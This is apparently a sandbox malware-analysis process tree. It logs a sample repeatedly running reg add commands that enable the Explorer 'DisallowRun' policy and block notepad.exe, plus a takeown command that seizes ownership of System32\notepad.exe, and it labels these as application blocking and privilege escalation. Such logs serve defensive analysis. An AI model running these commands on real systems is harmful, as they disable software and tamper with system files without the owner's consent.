    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6196
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6208
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6220
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6232
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:7076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6244
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6256
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:7252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6268
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6280
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6292
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6300
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6464
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6544
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6560
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6568
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6576
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7272
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7292
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7300
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7316
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7324
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7332
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7340
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7348
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7660
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7668
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7676
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7772
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7808
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7932
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:8072
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2148
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6164
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1120
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4016
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3608
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4280
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2844
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7424
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4624
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2392
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4240
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5844
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3408
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7728
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5056
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1636
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2224
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2428
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4380
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:8016
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1004
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7196
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4952
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3604
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7108
